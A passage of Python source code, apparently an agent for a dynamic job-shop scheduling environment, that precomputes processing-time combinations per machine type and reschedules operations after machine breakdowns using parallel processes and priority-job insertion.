def __init__(self, Env, conf_list):
self.conf_list = conf_list
self.Env = Env
self.checkpoint = None
self.iter = 0
# def __init__(self, Env, conf_list):
def train(self, run_time):
env = self.Env(self.conf_list[0])
# obs = env.reset()
machine_status, job_status, t, job_list = env.reset()
return Agent(env.job_types, env.machines)
# def train(self, run_time):
# class Trainer:
class Agent:
def __init__(self, job_types, machines):
self.machines = machines
self.job_types = job_types
self.total_num_ops = -1
self.total_num_machines = 0
self.perc_pend_time = 0.8
self.set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
# coeff_tardiness = 0.5
# num_cpu = multiprocessing.cpu_count()
num_op_job_types = {} # np.zeros(num_job_type)
key_dict_job_types = self.job_types.keys()
num_job_types = len(key_dict_job_types)
keys_job_types = []
hash_ind_job_types = {}
ind_job_type = 0
for key_job_type in key_dict_job_types:
keys_job_types.append(key_job_type)
num_op_temp = len(self.job_types[key_job_type])
num_op_job_types[key_job_type] = num_op_temp
hash_ind_job_types[key_job_type] = ind_job_type
ind_job_type = ind_job_type + 1
# for key_job_type in keys_job_type:
num_kind_mac = len(self.machines)
num_machine_types = {}
hash_ind_mac_types = {}
name_macs = []
idx_mac_types = {}
count_ind_mac = 0
for machine_temp in self.machines:
num_machine_types[machine_temp] = len(self.machines[machine_temp])
idx_mac_types[machine_temp] = count_ind_mac
# count_ind_mac = count_ind_mac + num_machine_types[machine_temp]
self.total_num_machines = self.total_num_machines + num_machine_types[machine_temp]
for ind_mac in range(num_machine_types[machine_temp]):
mac_name_temp = self.machines[machine_temp][ind_mac]
name_macs.append(mac_name_temp)
hash_ind_mac_types[mac_name_temp] = ind_mac
count_ind_mac = count_ind_mac + 1
# for ind_mac in range(num_machine_types[machine_temp]):
# for machine_temp in self.machines:
keys_mac_types = []
process_time_mac_jobs = {}
for machine_temp in self.machines:
keys_mac_types.append(machine_temp)
process_time_mac_jobs[machine_temp] = {}
for key_job_type in key_dict_job_types:
processing_time_temp = -1
for ind_op_temp in range(num_op_job_types[key_job_type]):
if self.job_types[key_job_type][ind_op_temp]['machine_type'] == machine_temp:
processing_time_temp = self.job_types[key_job_type][ind_op_temp]['process_time']
break
# if self.job_types[key_job_type][ind_op_temp]['machine_type'] == machine_temp:
# for ind_op_temp in range(num_op_job_types[key_job_type]):
process_time_mac_jobs[machine_temp][key_job_type] = processing_time_temp
# for key_job_type in key_dict_job_types:
# for machine_temp in self.machines:
max_num_comb_per_delta = 20
threshold_num_iter = 5
num_iter_expansion = 50
delta_comb_macs = {}
# comb_list_macs = {}
# delta_list_macs = {}
min_delta_macs = {}
for machine_temp in self.machines:
delta_comb_macs[machine_temp] = {}
count_unique_delta = 0
min_delta_temp = 0
comb_list = []
delta_list = []
comb_ele = [0 for _ in range(num_job_types)]
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
if process_time_mac_jobs[machine_temp][key_job_type] != -1:
comb_minus = comb_ele.copy()
comb_plus = comb_ele.copy()
comb_minus[ind_job_type] = 1
comb_list.append([comb_minus,comb_plus])
delta_temp = -process_time_mac_jobs[machine_temp][key_job_type]
delta_list.append(delta_temp)
if delta_temp not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_temp] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
delta_comb_macs[machine_temp][delta_temp].append([comb_minus,comb_plus])
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
if delta_temp < min_delta_temp:
min_delta_temp = delta_temp
# if delta_temp < min_delta_temp:
# if process_time_mac_jobs[machine_temp][key_job_type] != -1:
# for key_job_type in key_dict_job_types:
min_delta_macs[machine_temp] = min_delta_temp
# comb_list_macs[machine_temp] = comb_list.copy()
# delta_list_macs[machine_temp] = delta_list.copy()
for ind_iter in range(num_iter_expansion):
new_comb_list = []
new_delta_list = []
len_comb = len(comb_list)
for ind_comb in range(len_comb):
delta_before = delta_list[ind_comb]
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
processing_time_temp = process_time_mac_jobs[machine_temp][key_job_type]
if processing_time_temp <= 0:
continue
# if processing_time_temp <= 0:
comb_temp = copy.deepcopy(comb_list[ind_comb])
if comb_temp[1][ind_job_type] <= 0:
delta_new = delta_before - processing_time_temp
if delta_new < -min_delta_temp and delta_new >= min_delta_temp:
comb_temp[0][ind_job_type] = comb_temp[0][ind_job_type] + 1
if delta_new < 0 and delta_new not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_new] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if delta_new < 0 and max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_new]):
flag_repetition = False
for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
flag_repetition = True
break
# if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
# for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if flag_repetition == False:
delta_comb_macs[machine_temp][delta_new].append(comb_temp)
# if flag_repetition == False:
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
new_comb_list.append(comb_temp)
new_delta_list.append(delta_new)
# if delta_new < 0 and delta_new >= min_delta_temp:
# if comb_temp[1][ind_job_type] <= 0:
comb_temp = copy.deepcopy(comb_list[ind_comb])
if comb_temp[0][ind_job_type] <= 0:
delta_new = delta_before + processing_time_temp
if delta_new < -min_delta_temp and delta_new >= min_delta_temp:
comb_temp[1][ind_job_type] = comb_temp[1][ind_job_type] + 1
if delta_new < 0 and delta_new not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_new] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if delta_new < 0 and max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_new]):
flag_repetition = False
for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
flag_repetition = True
break
# if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
# for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if flag_repetition == False:
delta_comb_macs[machine_temp][delta_new].append(comb_temp)
# if flag_repetition == False:
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
new_comb_list.append(comb_temp)
new_delta_list.append(delta_new)
# if delta_new < 0 and delta_new >= min_delta_temp:
# if comb_temp[0][ind_job_type] <= 0:
# for ind_job_type in range(num_job_types):
# for ind_comb in range(len_comb):
comb_list = copy.deepcopy(new_comb_list)
delta_list = copy.deepcopy(new_delta_list)
if count_unique_delta + min_delta_temp >= 0 and ind_iter >= threshold_num_iter:
break
# if count_unique_delta + min_delta_temp >= 0 and ind_iter >= 3:
# for ind_iter in range(10):
# for machine_temp in self.machines:
max_length_comb = 500
num_iter_comb = 10
length_comb_macs = {}
for machine_type_temp in self.machines:
length_comb_macs[machine_type_temp] = []
list_base = [0]
for count_iter in range(num_iter_comb):
list_new = []
for ind_list in range(len(list_base)):
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
if process_time_mac_jobs[machine_type_temp][key_job_type] != -1:
process_time_temp = process_time_mac_jobs[machine_type_temp][key_job_type]
length_temp = process_time_temp + list_base[ind_list]
if len(length_comb_macs[machine_type_temp] ) > 0:
pos_new = 0
sentinel_same = False
while pos_new < len(length_comb_macs[machine_type_temp] ):
if length_comb_macs[machine_type_temp][pos_new] < length_temp:
pos_new = pos_new + 1
elif length_comb_macs[machine_type_temp][pos_new] == length_temp:
sentinel_same = True
break
else:
break
# if length_comb_macs[machine_type_temp][pos_new] < process_time_temp:
# while pos_new < len(length_comb_macs[machine_type_temp] ):
if sentinel_same == False and max_length_comb > length_temp:
length_comb_macs[machine_type_temp].insert(pos_new, length_temp)
list_new.append(length_temp)
# if sentinel_same == False:
else:
length_comb_macs[machine_type_temp].append(process_time_temp + list_base[ind_list])
list_new.append(process_time_temp + list_base[ind_list])
# if len(length_comb_macs[machine_type_temp] ) > 0:
# if process_time_mac_jobs[machine_temp][key_job_type] != -1:
# for ind_job_type in range(num_job_types):
# for ind_list in range(len(list_base)):
list_base = list_new
# for count_iter in range(num_iter_comb):
# for machine_type_temp in self.machines:
self.num_job_types = num_job_types
self.num_kind_mac = num_kind_mac
self.num_machine_types = num_machine_types
self.idx_mac_types = idx_mac_types
self.num_op_job_types = num_op_job_types
self.key_dict_job_types = key_dict_job_types
self.process_time_mac_jobs = process_time_mac_jobs
self.delta_comb_macs = delta_comb_macs
self.min_delta_macs = min_delta_macs
self.keys_job_types = keys_job_types
self.keys_mac_types = keys_mac_types
self.hash_ind_mac_types = hash_ind_mac_types
self.hash_ind_job_types = hash_ind_job_types
self.name_macs = name_macs
self.length_comb_macs = length_comb_macs
self.max_length_comb = max_length_comb
# self.sentinel_start = True
# def __init__(self, job_types, machines):
def act(self, machine_status, job_status, cur_time, job_list):
#---------------- Initialization ----------------#
if cur_time == 0: # self.sentinel_start:
self.init_construction(job_status, job_list, machine_status, cur_time)
# if self.sentinel_start:
#---------------- Breakdown Checking ----------------#
sentinel_breakdown = False
for machine_temp in machine_status:
if self.flag_mac_available[machine_temp] == 1 and machine_status[machine_temp]['status'] == 'down':
sentinel_breakdown = True
self.mac_set_breakdown.append(machine_temp)
self.flag_mac_available[machine_temp] = 0
mac_type_breakdown = machine_status[machine_temp]['type']
self.num_machine_available_types[mac_type_breakdown] = self.num_machine_available_types[mac_type_breakdown] - 1
# if machine_status[machine_temp]['status'] == 'down':
# for machine_temp in machine_status:
#---------------- Restoration ----------------#
if sentinel_breakdown:
# coeff_tardiness = 0.5
# start_time = time.time()
manager = multiprocessing.Manager()
makespan_ct_dict = manager.dict()
data_ct_dict = manager.dict()
jobs_ct = []
# set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
for ind_process in range(6):
proc = multiprocessing.Process(target=process_generate_resume, args=(self, cur_time, job_status, machine_status, self.set_coeff_tardiness[ind_process], makespan_ct_dict, data_ct_dict))
jobs_ct.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_ct:
proc.join()
# for proc in jobs:
ct_min_makespan = min(makespan_ct_dict ,key = makespan_ct_dict.get)
makespan_best = makespan_ct_dict[ct_min_makespan]
new_op_seq_machines_best, new_job_seq_machines_best, new_start_time_op_macs_best, new_end_time_op_macs_best, new_start_time_ops_best, new_end_time_ops_best, new_mac_assignment_ops_best, new_flag_scheduled_ops_best, count_scheduled_op_macs_best, new_flag_scheduled_jobs_best = data_ct_dict[ct_min_makespan]
if makespan_best > 9999:
print(0)
coeff_tardiness_best = ct_min_makespan
#print(makespan_ct_dict.values())
#print(ct_min_makespan)
#print(makespan_ct_dict[ct_min_makespan])
makespan_rnd_dict = manager.dict()
data_rnd_dict = manager.dict()
jobs_rnd = []
for ind_process in range(6):
proc = multiprocessing.Process(target=process_iteration_resume, args=(self, ind_process, cur_time, job_status, machine_status, coeff_tardiness_best, makespan_best, makespan_rnd_dict, data_rnd_dict))
jobs_rnd.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_rnd:
proc.join()
# for proc in jobs:
ind_rnd_min_makespan = min(makespan_rnd_dict ,key = makespan_rnd_dict.get)
if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
makespan_best = makespan_rnd_dict[ind_rnd_min_makespan]
new_op_seq_machines_best, new_job_seq_machines_best, new_start_time_op_macs_best, new_end_time_op_macs_best, new_start_time_ops_best, new_end_time_ops_best, new_mac_assignment_ops_best, new_flag_scheduled_ops_best, count_scheduled_op_macs_best, new_flag_scheduled_jobs_best = data_rnd_dict[ind_rnd_min_makespan]
# if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
# elapsed_time = (time.time() - start_time)
# print(elapsed_time)
# makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = self.generation_resume(cur_time, job_status, machine_status, coeff_tardiness)
self.op_seq_machines = new_op_seq_machines_best
self.job_seq_machines = new_job_seq_machines_best
self.start_time_op_macs = new_start_time_op_macs_best
self.end_time_op_macs = new_end_time_op_macs_best
self.start_time_ops = new_start_time_ops_best
self.end_time_ops = new_end_time_ops_best
self.mac_assignment_ops = new_mac_assignment_ops_best
self.flag_scheduled_ops = new_flag_scheduled_ops_best
self.count_scheduled_op_macs = count_scheduled_op_macs_best
self.new_flag_scheduled_jobs = new_flag_scheduled_jobs_best
#---------------- Verification ----------------#
penalty_pending_constraint = 0
for ind_job_check in range(self.num_job):
name_job_check = self.name_jobs[ind_job_check]
type_job_check = self.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
if self.flag_scheduled_jobs[ind_job_check] != 1:
print('unscheduled job')
# if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( self.num_op_jobs[ind_job_check] )
idx_first_op_job_check = self.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if self.flag_scheduled_ops[op_check] != 1:
print('unscheduled_ operation')
# if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
if ind_op_job_check > 0:
if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
print('incorrect start time')
# if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = self.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = self.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = self.end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if self.start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (self.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
for machine_temp in machine_status:
len_op_seq = len(self.op_seq_machines[machine_temp])
for ind_op_seq in range(len_op_seq-1):
if self.end_time_op_macs[machine_temp][ind_op_seq] > self.start_time_op_macs[machine_temp][ind_op_seq+1]:
print('Incorrect start time')
# if new_end_time_op_macs[machine_temp][ind_op_seq] > new_start_time_op_macs[machine_temp][ind_op_seq+1]:
# for ind_op_seq in range(len_op_seq-1):
# for machine_temp in machine_status:
print(penalty_pending_constraint)
# if sentinel_breakdown:
action = {}
for machine_temp in job_list:
ind_job_schedule_mac = self.count_scheduled_op_macs[machine_temp]
if ind_job_schedule_mac >= len(self.start_time_op_macs[machine_temp]):
continue
# if ind_job_schedule_mac >= len(self.start_time_op_macs[machine_temp]):
if cur_time == self.start_time_op_macs[machine_temp][ind_job_schedule_mac]:
action[machine_temp] = self.job_seq_machines[machine_temp][ind_job_schedule_mac]
self.count_scheduled_op_macs[machine_temp] = self.count_scheduled_op_macs[machine_temp] + 1
# if cur_time == self.start_time_op_macs[machine_temp][ind_job_schedule_mac]:
# for machine_temp in job_list:
return action
# def act(self, machine_status, job_status, cur_time, job_list):
def generation_resume(self, cur_time, job_status, machine_status, coeff_tardiness, rnd_mode):
count_scheduled_op_macs = {}
for machine_temp in self.name_macs:
count_scheduled_op_macs[machine_temp] = 0
# for machine_temp in key_job_list:
#---------------- Construction ----------------#
big_num = 99999
# new_num_job_dispatch_mac = self.group_job_mac.copy()
new_op_seq_machines = {}
new_job_seq_machines = {}
new_start_time_op_macs = {}
new_end_time_op_macs = {}
new_op_anchor_type_macs = {}
for machine_temp in machine_status:
new_op_seq_machines[machine_temp] = []
new_job_seq_machines[machine_temp] = []
new_start_time_op_macs[machine_temp] = []
new_end_time_op_macs[machine_temp] = []
new_op_anchor_type_macs[machine_temp] = -1
# for machine_temp in self.machines:
new_flag_scheduled_jobs = np.zeros(self.num_job)
new_flag_scheduled_ops = np.zeros(self.total_num_ops)
new_start_time_ops = -1 * np.ones(self.total_num_ops)
new_end_time_ops = -1 * np.ones(self.total_num_ops)
new_mac_assignment_ops = {}
new_ready_time_type_macs = {}
flag_available_type_macs= {}
available_mac_offset = {}
# broken_mac_offset = {}
new_scheduled_length_mac_types = {}
for machine_type_temp in self.machines:
new_ready_time_type_macs[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp]) # [0 for _ in range(self.num_machine_types[machine_type_temp])]
flag_available_type_macs[machine_type_temp] = np.ones(self.num_machine_types[machine_type_temp])
available_mac_offset[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp])
# broken_mac_offset[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp])
new_scheduled_length_mac_types[machine_type_temp] = 0
# for machine_type_temp in self.machines:
for ind_mac_broken in range(len(self.mac_set_breakdown)):
mac_broken = self.mac_set_breakdown[ind_mac_broken]
type_mac_broken = machine_status[mac_broken]['type']
hash_idx_mac_broken = self.hash_ind_mac_types[mac_broken]
flag_available_type_macs[type_mac_broken][hash_idx_mac_broken] = 0
available_mac_offset[type_mac_broken][hash_idx_mac_broken] = big_num
# broken_mac_offset[type_mac_broken][hash_idx_mac_broken] = -big_num
# for ind_mac_broken in range(len(mac_set_breakdown)):
num_scheduled_jobs_per_type = {}
for key_job_type in self.key_dict_job_types:
num_scheduled_jobs_per_type[key_job_type] = 0
# for key_job_type in self.key_dict_job_types:
occupy_time_type_macs = {}
cumul_pend_time_type_macs = {}
for mac_type_temp in self.machines:
occupy_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
cumul_pend_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
# for mac_type_temp in self.machines:
#---------------- Retention ----------------#
ordinary_job_inspect_list = []
for machine_temp in self.name_macs:
mac_type_temp = machine_status[machine_temp]['type']
hash_ind_mac_temp = self.hash_ind_mac_types[machine_temp]
ind_op_mac_temp = 0
len_op_mac_temp = len(self.op_seq_machines[machine_temp])
while ind_op_mac_temp < len_op_mac_temp:
idx_op_temp = self.op_seq_machines[machine_temp][ind_op_mac_temp]
ind_job_op_temp = self.ind_job_ops[idx_op_temp] # self.job_seq_machines[machine_temp][ind_op_mac_temp]
job_name_temp = self.name_jobs[ind_job_op_temp]
ind_op_op_temp = self.ind_op_ops[idx_op_temp]
job_type_temp = self.type_jobs[ind_job_op_temp]
priority_job_temp = job_status[job_name_temp]['priority']
if self.start_time_op_macs[machine_temp][ind_op_mac_temp] >= cur_time:
break
# if self.start_time_op_macs[machine_temp][ind_op_mac_temp] >= cur_time:
if self.flag_mac_available[machine_temp] == 0 and self.end_time_op_macs[machine_temp][ind_op_mac_temp] > cur_time:
break
# if self.flag_mac_available[machine_temp] == 0 and self.end_time_op_macs[machine_temp][ind_op_mac_temp] > cur_time:
new_op_seq_machines[machine_temp].append(idx_op_temp)
new_job_seq_machines[machine_temp].append(job_name_temp)
new_start_time_op_macs[machine_temp].append(self.start_time_op_macs[machine_temp][ind_op_mac_temp])
new_end_time_op_macs[machine_temp].append(self.end_time_op_macs[machine_temp][ind_op_mac_temp])
new_start_time_ops[idx_op_temp] = self.start_time_ops[idx_op_temp]
new_end_time_ops[idx_op_temp] = self.end_time_ops[idx_op_temp]
process_time_temp = new_end_time_ops[idx_op_temp] - new_start_time_ops[idx_op_temp] # self.job_types[job_type_temp][ind_op_op_temp]['process_time']
new_scheduled_length_mac_types[mac_type_temp] = new_scheduled_length_mac_types[mac_type_temp] + process_time_temp
new_flag_scheduled_ops[idx_op_temp] = 1
new_mac_assignment_ops[idx_op_temp] = machine_temp
occupy_time_type_macs[mac_type_temp][hash_ind_mac_temp] = occupy_time_type_macs[mac_type_temp][hash_ind_mac_temp] + process_time_temp
# if self.priority_jobs[ind_job_op_temp] <= 0:
# new_op_anchor_type_macs[machine_temp] = idx_op_temp
# # if self.priority_jobs[ind_job_op_temp] <= 0:
if ind_op_op_temp == 0:
new_flag_scheduled_jobs[ind_job_op_temp] = 1
# new_count_scheduled_jobs = new_count_scheduled_jobs + 1
if priority_job_temp <= 0:
ordinary_job_inspect_list.append(ind_job_op_temp)
num_scheduled_jobs_per_type[job_type_temp] = num_scheduled_jobs_per_type[job_type_temp] + 1
# if priority_job_temp > 0:
# if ind_op_op_temp == 0:
if ind_op_mac_temp > 0:
pend_time_temp = new_start_time_ops[ind_op_mac_temp] - new_end_time_ops[ind_op_mac_temp-1]
if pend_time_temp > 0:
cumul_pend_time_type_macs[mac_type_temp][hash_ind_mac_temp] = cumul_pend_time_type_macs[mac_type_temp][hash_ind_mac_temp] + pend_time_temp
# if pend_time_temp > 0:
# if ind_op_mac_temp > 0:
count_scheduled_op_macs[machine_temp] = count_scheduled_op_macs[machine_temp] + 1
ind_op_mac_temp = ind_op_mac_temp + 1
# while ind_op_mac_temp < len_op_mac_temp:
if len(new_end_time_op_macs[machine_temp]) > 0:
new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] = new_end_time_op_macs[machine_temp][-1] # self.end_time_op_macs[machine_temp][ind_op_mac_temp]
if new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] < cur_time:
new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] = cur_time
# if new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] < cur_time:
# if len(new_end_time_op_macs[machine_temp]) > 0:
# for machine_temp in self.name_macs:
#---------------- Priority ----------------#
for ind_set_job_priority in range(self.size_set_job_priority):
name_job_priority = self.set_job_priority[ind_set_job_priority]
idx_job_priority = int( self.idx_set_job_priority[name_job_priority] )
type_job_priority = self.type_jobs[idx_job_priority]
num_op_job_priority = int( self.num_op_jobs[idx_job_priority] )
idx_first_op_job_priority = self.idx_first_op_jobs[idx_job_priority]
job_constraint_temp = self.arrival_jobs_priority[name_job_priority]
for ind_op_job_priority in range(num_op_job_priority):
idx_op_schedule = int( idx_first_op_job_priority + ind_op_job_priority )
if new_flag_scheduled_ops[idx_op_schedule] == 1:
if new_end_time_ops[idx_op_schedule] > job_constraint_temp:
job_constraint_temp = new_end_time_ops[idx_op_schedule]
# if new_end_time_ops[idx_op_schedule] > job_constraint_temp:
continue
# if new_flag_scheduled_ops[idx_op_schedule] == 1:
mac_type_op_schedule = self.machine_type_ops[idx_op_schedule]
process_time_op_schedule = self.process_time_mac_jobs[mac_type_op_schedule][type_job_priority]
pend_time_op_schedule = self.job_types[type_job_priority][ind_op_job_priority]['max_pend_time']
start_time_final = -1
pend_time_final = -1
mac_op_final = None
ind_position_final = -1
num_mac_same_type = self.num_machine_types[mac_type_op_schedule]
idx_mac_min_leng = np.argmin(occupy_time_type_macs[mac_type_op_schedule] + cumul_pend_time_type_macs[mac_type_op_schedule] + available_mac_offset[mac_type_op_schedule])
if rnd_mode == 1:
idx_mac_min_leng = random.randint(0, num_mac_same_type-1)
mac_min_leng = self.machines[mac_type_op_schedule][idx_mac_min_leng]
while self.flag_mac_available[mac_min_leng] == 0:
idx_mac_min_leng = random.randint(0, num_mac_same_type-1)
mac_min_leng = self.machines[mac_type_op_schedule][idx_mac_min_leng]
# while self.flag_mac_available[mac_op_schedule] == 0:
# if rnd_mode == 1:
#----------- Postpone -----------#
# if pend_time_final > 0:
count_attempt = 0
idx_mac_op_schedule = idx_mac_min_leng
while count_attempt < num_mac_same_type:
mac_op_schedule = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
if self.flag_mac_available[mac_op_schedule] == 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
continue
# if self.flag_mac_available[mac_candidate] == 0:
start_time_candidate = job_constraint_temp
if len(new_end_time_op_macs[mac_op_schedule]) > 0:
if new_end_time_op_macs[mac_op_schedule][-1] > start_time_candidate:
start_time_candidate = new_end_time_op_macs[mac_op_schedule][-1]
# if new_end_time_op_macs[mac_op_schedule][-1] > start_time_candidate:
# if len(new_end_time_op_macs[mac_op_schedule]) > 0:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
if job_constraint_temp + pend_time_op_schedule - start_time_candidate < 0:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial = self.priority_backward(cur_time, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, ind_op_job_priority, start_time_candidate, pend_time_op_schedule, idx_first_op_job_priority, idx_job_priority, new_mac_assignment_ops, new_op_seq_machines)
if sentinel_feasible:
pend_time_final = 0
mac_op_final = mac_op_schedule
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
break
# sentinel_feasible
else:
pend_time_final = 0
mac_op_final = mac_op_schedule
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
# if job_constraint_temp + pend_time_op_schedule - start_time_candidate < 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
# while count_attempt < num_mac_same_type:
# if pend_time_final > 0:
#----------- Last Insertion -----------#
if pend_time_final == -1:
count_attempt = 0
idx_mac_op_schedule = idx_mac_min_leng
while count_attempt < num_mac_same_type:
mac_candidate = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
if self.flag_mac_available[mac_candidate] == 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
continue
# if self.flag_mac_available[mac_candidate] == 0:
start_time_candidate = job_constraint_temp
if len(new_end_time_op_macs[mac_candidate]) > 0:
if new_end_time_op_macs[mac_candidate][-1] > start_time_candidate:
start_time_candidate = new_end_time_op_macs[mac_candidate][-1]
# if new_end_time_op_macs[mac_candidate][-1] > start_time_candidate:
# if len(new_end_time_op_macs[mac_candidate]) > 0:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
pend_time_candidate = start_time_candidate - job_constraint_temp - pend_time_op_schedule
if pend_time_final == -1:
pend_time_final = pend_time_candidate
mac_op_final = mac_candidate
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
elif pend_time_candidate < pend_time_final:
pend_time_final = pend_time_candidate
mac_op_final = mac_candidate
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
# if pend_time_final == -1:
if pend_time_final <= 0:
break
# if pend_time_candidate <= 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
# while count_attempt < num_mac_same_type:
# if pend_time_final > 0:
#------- update intermediate data -------#
new_start_time_ops[idx_op_schedule] = start_time_final
new_end_time_ops[idx_op_schedule] = start_time_final + process_time_op_schedule
new_op_seq_machines[mac_op_final].insert(ind_position_final, idx_op_schedule)
new_job_seq_machines[mac_op_final].insert(ind_position_final, name_job_priority)
new_start_time_op_macs[mac_op_final].insert(ind_position_final, new_start_time_ops[idx_op_schedule])
new_end_time_op_macs[mac_op_final].insert(ind_position_final, new_end_time_ops[idx_op_schedule])
new_mac_assignment_ops[idx_op_schedule] = mac_op_final
new_flag_scheduled_ops[idx_op_schedule] = 1
new_scheduled_length_mac_types[mac_type_op_schedule] = new_scheduled_length_mac_types[mac_type_op_schedule] + process_time_op_schedule
occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] = occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] + process_time_op_schedule
job_constraint_temp = new_end_time_ops[idx_op_schedule]
# for ind_op_job_priority in range(num_op_job_priority):
new_flag_scheduled_jobs[idx_job_priority] = 1
# for ind_job_priority in range(size_set_job_priority):
#---------------- Unfinished Jobs ----------------#
pos_insertion_macs = {}
op_priority_ref_macs = {}
for mac_type_temp in self.machines:
num_mac_type_temp = self.num_machine_types[mac_type_temp]
# pos_insertion_type_mac[mac_type_temp] = np.zeros(num_mac_type_temp)
for ind_mac_type in range(num_mac_type_temp):
mac_name_temp = self.machines[mac_type_temp][ind_mac_type]
count_scheduled_op_temp = count_scheduled_op_macs[mac_name_temp]
pos_insertion_macs[mac_name_temp] = count_scheduled_op_temp
if count_scheduled_op_temp < len(new_op_seq_machines[mac_name_temp]):
op_temp = new_op_seq_machines[mac_name_temp][count_scheduled_op_temp]
ind_job_temp = self.ind_job_ops[op_temp]
name_job_temp = self.name_jobs[ind_job_temp]
priority_job_temp = self.priority_jobs_priority[name_job_temp]
if priority_job_temp > 0:
op_priority_ref_macs[mac_name_temp] = int( op_temp )
else:
print('incorrect processing sequence')
# if priority_job_temp > 0:
else:
op_priority_ref_macs[mac_name_temp] = -1
# pos_insertion_macs[mac_name_temp] = count_scheduled_op_temp
# for ind_mac_type in range(num_mac_type_temp):
# for mac_type_temp in self.machines:
for machine_temp in machine_status:
num_op_mac_temp = len(new_op_seq_machines[machine_temp])
# ind_last_ordinary_op = 0
for ind_op_mac in range(num_op_mac_temp):
op_iter = new_op_seq_machines[machine_temp][ind_op_mac]
